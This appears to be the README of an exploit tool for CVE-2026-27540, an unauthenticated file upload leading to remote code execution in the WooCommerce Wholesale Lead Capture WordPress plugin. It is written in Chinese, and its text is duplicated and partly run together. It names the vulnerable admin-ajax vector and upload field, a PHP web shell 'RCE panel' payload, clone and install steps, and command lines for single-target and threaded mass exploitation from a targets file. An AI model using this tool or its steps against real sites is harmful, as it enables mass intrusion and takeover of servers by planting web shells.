WooCommerce Wholesale Lead Capture (WWLC) — 未认证文件上传 → RCE
| 产品 | WooCommerce Wholesale Lead Capture — wwlc 插件 |
| 版本 | ≤ 2.0.3.1 |
| 已修复 | 2.0.3.2+ — 上传处理器已加固 |
| 认证 | 未认证 |
| 向量 | admin-ajax.php?action=wwlc_file_upload_handler |
| 字段 | file(multipart 上传) |
| 写入路径 | WordPress uploads 目录 |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handler POST 请求进行速率限制git clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| 文件 | 作用 |
|---|---|
winrarzips_brand.py | CMD 横幅(by winrarzips) |
wwlc_core.py | Exploit 核心 |
CVE-2026-27540-Suite.py | 批量 + 单目标 CLI |
payloads/x7-panel.php | RCE 面板 |
requirements.txt | 依赖项 |
❌ 目标列表、扫描结果和面板 URL 不包含在仓库中。
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed
WooCommerce Wholesale Lead Capture (WWLC) — 未认证文件上传 → RCE
| 产品 | WooCommerce Wholesale Lead Capture — wwlc 插件 |
| 受影响版本 | ≤ 2.0.3.1 |
| 已修复 | 2.0.3.2+ — 上传处理器已加固 |
| 认证 | 未认证 |
| 向量 | admin-ajax.php?action=wwlc_file_upload_handler |
| 字段 | file(multipart 上传) |
| 写入路径 | WordPress uploads 目录 |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handler POST 请求进行速率限制git clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| 文件 | 作用 |
|---|---|
winrarzips_brand.py | CMD 横幅(by winrarzips) |
wwlc_core.py | Exploit 核心 |
CVE-2026-27540-Suite.py | 批量 + 单目标 CLI |
payloads/x7-panel.php | RCE 面板 payload |
requirements.txt | 依赖项 |
❌ 目标列表、扫描结果和在线面板 URL 不包含在内。
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed